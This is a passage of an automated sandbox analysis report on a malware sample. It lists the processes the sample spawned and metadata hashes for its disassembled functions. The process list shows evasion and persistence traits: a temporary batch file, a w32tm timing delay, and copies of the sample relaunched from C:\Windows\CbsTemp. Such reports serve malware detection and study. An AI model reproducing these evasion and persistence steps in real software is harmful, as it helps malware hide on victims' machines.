                                                          Programmed in:C, C++ or other language
                                                          Has exited:true

                                                          General

                                                          Target ID:59
                                                          Start time:12:17:21
                                                          Start date:20/10/2024
                                                          Path:C:\Windows\System32\conhost.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                          Imagebase:0x7ff6d64d0000
                                                          File size:862'208 bytes
                                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Has exited:false

                                                          General

                                                          Target ID:60
                                                          Start time:12:17:22
                                                          Start date:20/10/2024
                                                          Path:C:\Windows\System32\conhost.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                          Imagebase:0x7ff6d64d0000
                                                          File size:862'208 bytes
                                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Has exited:false

                                                          General

                                                          Target ID:61
                                                          Start time:12:17:22
                                                          Start date:20/10/2024
                                                          Path:C:\Windows\System32\conhost.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                          Imagebase:0x7ff6d64d0000
                                                          File size:862'208 bytes
                                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Has exited:false

                                                          General

                                                          Target ID:62
                                                          Start time:12:17:22
                                                          Start date:20/10/2024
                                                          Path:C:\Windows\System32\conhost.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                          Imagebase:0x7ff6d64d0000
                                                          File size:862'208 bytes
                                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Has exited:false

                                                          General

                                                          Target ID:63
                                                          Start time:12:17:22
                                                          Start date:20/10/2024
                                                          Path:C:\Windows\System32\conhost.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                          Imagebase:0x7ff6d64d0000
                                                          File size:862'208 bytes
                                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Has exited:false

                                                          General

                                                          Target ID:64
                                                          Start time:12:17:22
                                                          Start date:20/10/2024
                                                          Path:C:\Windows\System32\cmd.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:"C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\lE7emhVBWP.bat"
                                                          Imagebase:0x7ff68cac0000
                                                          File size:289'792 bytes
                                                          MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Has exited:true

                                                          General

                                                          Target ID:65
                                                          Start time:12:17:23
                                                          Start date:20/10/2024
                                                          Path:C:\Windows\System32\conhost.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                          Imagebase:0x7ff6d64d0000
                                                          File size:862'208 bytes
                                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Has exited:true

                                                          General

                                                          Target ID:66
                                                          Start time:12:17:23
                                                          Start date:20/10/2024
                                                          Path:C:\Users\user\Desktop\9XHFe6y4Dj.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:C:\Users\user\Desktop\9XHFe6y4Dj.exe
                                                          Imagebase:0xc10000
                                                          File size:16'272'384 bytes
                                                          MD5 hash:8213A9C837181823A4D58728637EAEB5
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Has exited:true

                                                          General

                                                          Target ID:68
                                                          Start time:12:17:25
                                                          Start date:20/10/2024
                                                          Path:C:\Users\user\Desktop\9XHFe6y4Dj.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:C:\Users\user\Desktop\9XHFe6y4Dj.exe
                                                          Imagebase:0x3b0000
                                                          File size:16'272'384 bytes
                                                          MD5 hash:8213A9C837181823A4D58728637EAEB5
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Has exited:true

                                                          General

                                                          Target ID:69
                                                          Start time:12:17:26
                                                          Start date:20/10/2024
                                                          Path:C:\Windows\System32\chcp.com
                                                          Wow64 process (32bit):false
                                                          Commandline:chcp 65001
                                                          Imagebase:0x7ff7a16a0000
                                                          File size:14'848 bytes
                                                          MD5 hash:33395C4732A49065EA72590B14B64F32
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Has exited:true

                                                          General

                                                          Target ID:70
                                                          Start time:12:17:28
                                                          Start date:20/10/2024
                                                          Path:C:\Windows\System32\w32tm.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
                                                          Imagebase:0x7ff726700000
                                                          File size:108'032 bytes
                                                          MD5 hash:81A82132737224D324A3E8DA993E2FB5
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Has exited:true

                                                          General

                                                          Target ID:71
                                                          Start time:12:17:34
                                                          Start date:20/10/2024
                                                          Path:C:\Windows\CbsTemp\tqeRXJHxPWPPoiNqjJeEYdv.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:"C:\Windows\CbsTemp\tqeRXJHxPWPPoiNqjJeEYdv.exe"
                                                          Imagebase:0x640000
                                                          File size:16'272'384 bytes
                                                          MD5 hash:8213A9C837181823A4D58728637EAEB5
                                                          Has elevated privileges:false
                                                          Has administrator privileges:false
                                                          Programmed in:C, C++ or other language
                                                          Antivirus matches:
                                                          • Detection: 66%, ReversingLabs
                                                          Has exited:false

                                                          General

                                                          Target ID:72
                                                          Start time:12:17:36
                                                          Start date:20/10/2024
                                                          Path:C:\Users\user\Desktop\9XHFe6y4Dj.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:"C:\Users\user\Desktop\9XHFe6y4Dj.exe"
                                                          Imagebase:0x110000
                                                          File size:16'272'384 bytes
                                                          MD5 hash:8213A9C837181823A4D58728637EAEB5
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Has exited:true

                                                          General

                                                          Target ID:73
                                                          Start time:12:17:48
                                                          Start date:20/10/2024
                                                          Path:C:\Windows\System32\wbem\WmiPrvSE.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
                                                          Imagebase:0x7ff6ef0c0000
                                                          File size:496'640 bytes
                                                          MD5 hash:60FF40CFD7FB8FE41EE4FE9AE5FE1C51
                                                          Has elevated privileges:true
                                                          Has administrator privileges:false
                                                          Programmed in:C, C++ or other language
                                                          Has exited:false

                                                          General

                                                          Target ID:74
                                                          Start time:12:17:48
                                                          Start date:20/10/2024
                                                          Path:C:\Users\user\Desktop\9XHFe6y4Dj.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:"C:\Users\user\Desktop\9XHFe6y4Dj.exe"
                                                          Imagebase:0xcd0000
                                                          File size:16'272'384 bytes
                                                          MD5 hash:8213A9C837181823A4D58728637EAEB5
                                                          Has elevated privileges:false
                                                          Has administrator privileges:false
                                                          Programmed in:C, C++ or other language
                                                          Has exited:true

                                                          General

                                                          Target ID:76
                                                          Start time:12:17:54
                                                          Start date:20/10/2024
                                                          Path:C:\Windows\System32\svchost.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
                                                          Imagebase:0x7ff7e52b0000
                                                          File size:55'320 bytes
                                                          MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Has exited:false

                                                          General

                                                          Target ID:77
                                                          Start time:12:18:00
                                                          Start date:20/10/2024
                                                          Path:C:\Windows\CbsTemp\tqeRXJHxPWPPoiNqjJeEYdv.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:"C:\Windows\CbsTemp\tqeRXJHxPWPPoiNqjJeEYdv.exe"
                                                          Imagebase:0x680000
                                                          File size:16'272'384 bytes
                                                          MD5 hash:8213A9C837181823A4D58728637EAEB5
                                                          Has elevated privileges:false
                                                          Has administrator privileges:false
                                                          Programmed in:C, C++ or other language
                                                          Has exited:true

                                                          General

                                                          Target ID:78
                                                          Start time:12:18:08
                                                          Start date:20/10/2024
                                                          Path:C:\Users\user\Desktop\9XHFe6y4Dj.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:"C:\Users\user\Desktop\9XHFe6y4Dj.exe"
                                                          Imagebase:0x270000
                                                          File size:16'272'384 bytes
                                                          MD5 hash:8213A9C837181823A4D58728637EAEB5
                                                          Has elevated privileges:false
                                                          Has administrator privileges:false
                                                          Programmed in:C, C++ or other language
                                                          Has exited:true

                                                          General

                                                          Target ID:79
                                                          Start time:12:18:17
                                                          Start date:20/10/2024
                                                          Path:C:\Windows\CbsTemp\tqeRXJHxPWPPoiNqjJeEYdv.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:"C:\Windows\CbsTemp\tqeRXJHxPWPPoiNqjJeEYdv.exe"
                                                          Imagebase:0xb30000
                                                          File size:16'272'384 bytes
                                                          MD5 hash:8213A9C837181823A4D58728637EAEB5
                                                          Has elevated privileges:false
                                                          Has administrator privileges:false
                                                          Programmed in:C, C++ or other language
                                                          Has exited:true

                                                          Disassembly

                                                          Reset < >

                                                            Executed Functions

                                                            Function 00007FF849346800 Relevance: .8, Instructions: 849COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.3445459192.00007FF849340000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849340000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7ff849340000_9XHFe6y4Dj.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 42c2ed7aee519eb41a38c468112c8b64a104751174f98685d522ecbe04754cde
                                                            • Instruction ID: a2af38768357907c7edbfe3b46a1c090c63ad8207fb4b21a5bcf42902769518f
                                                            • Opcode Fuzzy Hash: 42c2ed7aee519eb41a38c468112c8b64a104751174f98685d522ecbe04754cde
                                                            • Instruction Fuzzy Hash: F3520730A0CA8D8FDBA8EF18C855AB977E1FF46354F1151B9D04EC7292DA25AC46CF81
                                                            Function 00007FF848BF0D78 Relevance: .3, Instructions: 261COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2644593300.00007FF848BF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848BF0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7ff848bf0000_9XHFe6y4Dj.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 1821e3934f6180c74472a79aada2216337b0baef08634add88dd7871aebcb99b
                                                            • Instruction ID: c92451d4a03a4a441b35b65e526ef4cdfc7846a78c3e8aabd9fc037135e2059a
                                                            • Opcode Fuzzy Hash: 1821e3934f6180c74472a79aada2216337b0baef08634add88dd7871aebcb99b
                                                            • Instruction Fuzzy Hash: 7391C271D1CA898FE789EF2888693A9BFE1FB56750F1001BAC249C76E2CF791419C711
                                                            Function 00007FF84934A167 Relevance: 5.1, Strings: 4, Instructions: 122COMMON
                                                            Download Yara Rule
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.3445459192.00007FF849340000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849340000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7ff849340000_9XHFe6y4Dj.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: X.=I$X.=I$X.=I$X.=I
                                                            • API String ID: 0-2261867308
                                                            • Opcode ID: 351dd3ade37b267961d845c3d641ce86733bf1dd5d3f02321e9f9507d0ed1c67
                                                            • Instruction ID: 853d092dd1209a99955d5230e690c2a678ea87e32267f53e671b668680b2a5e2
                                                            • Opcode Fuzzy Hash: 351dd3ade37b267961d845c3d641ce86733bf1dd5d3f02321e9f9507d0ed1c67
                                                            • Instruction Fuzzy Hash: 1D415132A0C9599FDF98FF28C495EA4B7E1FB69714B0501A9D00AC3592CF35EC55CB81
                                                            Function 00007FF84934A211 Relevance: 5.1, Strings: 4, Instructions: 118COMMON
                                                            Download Yara Rule
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.3445459192.00007FF849340000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849340000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7ff849340000_9XHFe6y4Dj.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: X.=I$X.=I$X.=I$X.=I
                                                            • API String ID: 0-2261867308
                                                            • Opcode ID: 33c055f16ba9002db785e6d38a1259c84748b0160221eb8e3e89b226c68c3340
                                                            • Instruction ID: aaaffec75965af5448ca7fa904013c30a0368f1c6bdfbb690719a7c6eb1e1438
                                                            • Opcode Fuzzy Hash: 33c055f16ba9002db785e6d38a1259c84748b0160221eb8e3e89b226c68c3340
                                                            • Instruction Fuzzy Hash: F9316032A0C9558FDF9CEF28C095E6477E1FB69718B0502A9D00AC7592CF24EC45CB81
                                                            Function 00007FF84934A1AB Relevance: 5.1, Strings: 4, Instructions: 113COMMON
                                                            Download Yara Rule
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.3445459192.00007FF849340000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849340000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7ff849340000_9XHFe6y4Dj.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: X.=I$X.=I$X.=I$X.=I
                                                            • API String ID: 0-2261867308
                                                            • Opcode ID: 55e999996a9f76226f267fb375e1f64c300f6f5bc5b7046dcf6ed1582861fe72
                                                            • Instruction ID: 30d3641253e84188ef7d5dca96611b7c9b9e5ebbf4d9569140206864f036c515
                                                            • Opcode Fuzzy Hash: 55e999996a9f76226f267fb375e1f64c300f6f5bc5b7046dcf6ed1582861fe72
                                                            • Instruction Fuzzy Hash: DD315E32A0C9598FDF98FF28C095EA473E1FB69714B0501A9D00AC7692CF34EC85CB81
                                                            Function 00007FF849348888 Relevance: 4.0, Strings: 3, Instructions: 227COMMON
                                                            Download Yara Rule
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.3445459192.00007FF849340000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849340000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7ff849340000_9XHFe6y4Dj.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: $X.=I$xI4I
                                                            • API String ID: 0-1049832598
                                                            • Opcode ID: 1c0f3a2badd5f3dd4ccc282dee02529fe5d025779257fbcf7f92bb4634728681
                                                            • Instruction ID: 43e21b1662660fe135592b5ce13479fb0ea2d899391b84a92782d7abc11c692d
                                                            • Opcode Fuzzy Hash: 1c0f3a2badd5f3dd4ccc282dee02529fe5d025779257fbcf7f92bb4634728681
                                                            • Instruction Fuzzy Hash: CD71A171D0C68E9FEB69EF68C8556BDBBB1FF46340F1541BAD009D7282CA386901CB51
                                                            Function 00007FF849340C18 Relevance: 3.9, Strings: 3, Instructions: 157COMMON
                                                            Download Yara Rule
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.3445459192.00007FF849340000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849340000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7ff849340000_9XHFe6y4Dj.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: $`3I$`3I
                                                            • API String ID: 0-566467615
                                                            • Opcode ID: 329f67e52413bd3c32b7ed6988b3c4224a356f0d07a5c650480438e196712fcf
                                                            • Instruction ID: 5cf5053c8dcc216fc14647d058016430ade2f56fc22210e38b4e5f851ba2cb45
                                                            • Opcode Fuzzy Hash: 329f67e52413bd3c32b7ed6988b3c4224a356f0d07a5c650480438e196712fcf
                                                            • Instruction Fuzzy Hash: CA515C30E0C68A9FDB69EF98D4515BDBBB1FF56340F1144BEC00AAB296CA346905CB50
                                                            Function 00007FF849345D77 Relevance: 2.8, Strings: 2, Instructions: 313COMMON
                                                            Download Yara Rule
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.3445459192.00007FF849340000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849340000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7ff849340000_9XHFe6y4Dj.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: X.=I$X.=I
                                                            • API String ID: 0-1331653755
                                                            • Opcode ID: b525ddaba26cc1ec9c4f6a31a4cad7cebe3f9e10fa29d16f5cedfc78a3b07358
                                                            • Instruction ID: 15e9b524bb3d94468ba87c1d3af55db061d47d8b3ea7159cfa829ad416c61046
                                                            • Opcode Fuzzy Hash: b525ddaba26cc1ec9c4f6a31a4cad7cebe3f9e10fa29d16f5cedfc78a3b07358
                                                            • Instruction Fuzzy Hash: 5421CE32D1E6E3DEF634BA6838110F86640EF132E1F2A22BBD54E860C39D1C28555397
                                                            Function 00007FF848FBE599 Relevance: 2.6, Strings: 2, Instructions: 125COMMON
                                                            Download Yara Rule
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2999115847.00007FF848FB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848FB0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7ff848fb0000_9XHFe6y4Dj.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: X<I$X<I
                                                            • API String ID: 0-2476742363
                                                            • Opcode ID: 2c44997901dd105287b63f514e80ca81eca688e3cc701163931f6b67c9178fee
                                                            • Instruction ID: 9a9ef3a4cbf0f3ba5b431be2333aad7a1bf47a462569f86fdc8f823c0a2f5479
                                                            • Opcode Fuzzy Hash: 2c44997901dd105287b63f514e80ca81eca688e3cc701163931f6b67c9178fee
                                                            • Instruction Fuzzy Hash: BE31E031D0D59A9FF76977A458111B83B98EF223A0F1405BAD44E8F0C3EF4C3849939A
                                                            Function 00007FF848FBE97A Relevance: 2.6, Strings: 2, Instructions: 73COMMON
                                                            Download Yara Rule
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2999115847.00007FF848FB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848FB0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7ff848fb0000_9XHFe6y4Dj.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: X<I$X<I
                                                            • API String ID: 0-2476742363
                                                            • Opcode ID: fe72c105291c099c7a6c93e25c9d1d60a3b7efa12a50740843da6cab7993a0eb
                                                            • Instruction ID: 13fd96ef4347b637c2317afb0fefd85d6997503310952c03d9c409f7896dc98e
                                                            • Opcode Fuzzy Hash: fe72c105291c099c7a6c93e25c9d1d60a3b7efa12a50740843da6cab7993a0eb
                                                            • Instruction Fuzzy Hash: 8221C331D4E2D28FF36B737428601B87E546F636A4F1901FAD0895E4C3DE8C2549A79B
                                                            Function 00007FF848FB3945 Relevance: 2.0, Strings: 1, Instructions: 779COMMON
                                                            Download Yara Rule
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2999115847.00007FF848FB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848FB0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7ff848fb0000_9XHFe6y4Dj.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: d
                                                            • API String ID: 0-2564639436
                                                            • Opcode ID: 3ebfad841e9aa35b9d9eab0203942827e76d1fe99d3dcaae6d4ead7348db8fe0
                                                            • Instruction ID: f44345449612a8bd08eac8638639104af88bf396977710faf56c13c0b535a3af
                                                            • Opcode Fuzzy Hash: 3ebfad841e9aa35b9d9eab0203942827e76d1fe99d3dcaae6d4ead7348db8fe0
                                                            • Instruction Fuzzy Hash: F032FF31A1CA4A4FEB48EF1CD8855B177E0FF65354B2401BAD48AC7297EA39F8438785
                                                            Function 00007FF849340742 Relevance: 1.6, Strings: 1, Instructions: 308COMMON
                                                            Download Yara Rule
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.3445459192.00007FF849340000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849340000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7ff849340000_9XHFe6y4Dj.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: `3I
                                                            • API String ID: 0-3922798408
                                                            • Opcode ID: c3eec9d04991c9a2210b10a0bc3813d76093af3d6ed4d3b21ee4896f26d5416a
                                                            • Instruction ID: 4fc9ff5bb57718c3ed8c8c4a47a8f11104a72f3984996da8a023a1d700f426d2
                                                            • Opcode Fuzzy Hash: c3eec9d04991c9a2210b10a0bc3813d76093af3d6ed4d3b21ee4896f26d5416a
                                                            • Instruction Fuzzy Hash: 62B1DF30A1CA869FE758EF28C0906B4B7A1FF5A340F55517AC04EC7A97CB38B851CB91
                                                            Function 00007FF849348C6C Relevance: 1.5, Strings: 1, Instructions: 282COMMON
                                                            Download Yara Rule
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.3445459192.00007FF849340000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849340000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7ff849340000_9XHFe6y4Dj.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: X.=I
                                                            • API String ID: 0-2026250801
                                                            • Opcode ID: 18ec9bda06de8132b22ba43a5cf045c5870ad12f8a8db2bd2e8c3916a1b6c876
                                                            • Instruction ID: a3b84b7042fbc8d99f9efee7f2d8c6ffaf9edc647ce3f3d4d95bb87d206bbd06
                                                            • Opcode Fuzzy Hash: 18ec9bda06de8132b22ba43a5cf045c5870ad12f8a8db2bd2e8c3916a1b6c876
                                                            • Instruction Fuzzy Hash: 81A1CF3051D5968FEB58EF18C4D06B437A1FF56351B6556BDC84ACB68BCB38E882CB80
                                                            Function 00007FF848FBA698 Relevance: 1.4, Strings: 1, Instructions: 161COMMON
                                                            Download Yara Rule
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2999115847.00007FF848FB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848FB0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7ff848fb0000_9XHFe6y4Dj.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID: 0-3916222277
                                                            • Opcode ID: e16f0ed487b760c052420d093e2d392ec14168f6f3a70c4df934d7c34c619c73
                                                            • Instruction ID: 7067d4d8121aa521936235ca81988f4b9514d6798b3a6b0d371897e34e53b08b
                                                            • Opcode Fuzzy Hash: e16f0ed487b760c052420d093e2d392ec14168f6f3a70c4df934d7c34c619c73
                                                            • Instruction Fuzzy Hash: B8515770D0D64A9FDB59EBA8D4545BDBBB1FF68340F2041BAC00AE72C2DB386946CB54
                                                            Function 00007FF848FB1008 Relevance: 1.4, Strings: 1, Instructions: 158COMMON
                                                            Download Yara Rule
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2999115847.00007FF848FB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848FB0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7ff848fb0000_9XHFe6y4Dj.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID: 0-3916222277
                                                            • Opcode ID: 96f9189bd5d635f640544187a498de91dc582ffab37c5d53d1e7f44236fc1732
                                                            • Instruction ID: 93a8e5d6c70b768762702cf112ae56228347aa4cbcc11711ca82fcfb67272a16
                                                            • Opcode Fuzzy Hash: 96f9189bd5d635f640544187a498de91dc582ffab37c5d53d1e7f44236fc1732
                                                            • Instruction Fuzzy Hash: CF516C71E0C64A9FEB59EBA8C4515BDB7B1FF54380F1041BAC00AE72C6CB382946CB54
                                                            Function 00007FF849348E90 Relevance: 1.4, Strings: 1, Instructions: 155COMMON
                                                            Download Yara Rule
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.3445459192.00007FF849340000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849340000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7ff849340000_9XHFe6y4Dj.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: X.=I
                                                            • API String ID: 0-2026250801
                                                            • Opcode ID: 40239df3b0ab5d12508c9f0da032cea65a4475d189e40e3cac8c5d9933c26f85
                                                            • Instruction ID: 812c3e38394399eb754ae333a858da1e61b1db965ecc4da7cef0d614c4fdd419
                                                            • Opcode Fuzzy Hash: 40239df3b0ab5d12508c9f0da032cea65a4475d189e40e3cac8c5d9933c26f85
                                                            • Instruction Fuzzy Hash: E3519C30D0C6998FEBA9EF2888647A8B7A1FF56744F0541FAD40DD7292DE3828858B01
                                                            Function 00007FF84934A730 Relevance: 1.4, Strings: 1, Instructions: 133COMMON
                                                            Download Yara Rule
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.3445459192.00007FF849340000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849340000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7ff849340000_9XHFe6y4Dj.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: (:?I
                                                            • API String ID: 0-987818883
                                                            • Opcode ID: 4c8f9705647fd880fe9305292d15110bc4830c38893ba786d9eb2ff34f158369
                                                            • Instruction ID: a91d3b2a919b1963d0965897c7781ba257faa02246a9f73463482246be1cd241
                                                            • Opcode Fuzzy Hash: 4c8f9705647fd880fe9305292d15110bc4830c38893ba786d9eb2ff34f158369
                                                            • Instruction Fuzzy Hash: E9412530D1C89A8EEB78EF2884916F9B7E1FF5A754F1441B9C04EC7596CE3879858780
                                                            Function 00007FF84934CF18 Relevance: 1.4, Strings: 1, Instructions: 126COMMON
                                                            Download Yara Rule
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.3445459192.00007FF849340000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849340000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7ff849340000_9XHFe6y4Dj.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: "^H
                                                            • API String ID: 0-2240470887
                                                            • Opcode ID: d5fea1680e2146bcc07409b581ca2998922dbdd9d1de25ad038076905287d36b
                                                            • Instruction ID: ba9d11e591df393ca60fe64d60f5d335823fa481389834de2f33e420e20cacc4
                                                            • Opcode Fuzzy Hash: d5fea1680e2146bcc07409b581ca2998922dbdd9d1de25ad038076905287d36b
                                                            • Instruction Fuzzy Hash: F541F430D1D49A8FEB78EB1884556B8B7A1FF5A360F1446B9D04EC7186CE387985C780
                                                            Function 00007FF849349F75 Relevance: 1.3, Strings: 1, Instructions: 93COMMON
                                                            Download Yara Rule
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.3445459192.00007FF849340000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849340000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7ff849340000_9XHFe6y4Dj.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: X.=I
                                                            • API String ID: 0-2026250801
                                                            • Opcode ID: ec4a12014acd4993a1c44a0e74000ed1306f93f1d0b95c46d8daeb874e973701
                                                            • Instruction ID: cbbf7edda39a3db29ec0d838771b86b7876bf5c6bb9ba1650f802fa4ba54569e
                                                            • Opcode Fuzzy Hash: ec4a12014acd4993a1c44a0e74000ed1306f93f1d0b95c46d8daeb874e973701
                                                            • Instruction Fuzzy Hash: 4E313831D0C98ECFEBA8EF5484915BD7BA0FF46785F5211BAD00ED6181DB38A8409B81
                                                            Function 00007FF84934A6F2 Relevance: 1.3, Strings: 1, Instructions: 91COMMON
                                                            Download Yara Rule
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.3445459192.00007FF849340000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849340000, based on PE: false
                                                            Joe Sandbox IDA Plugin
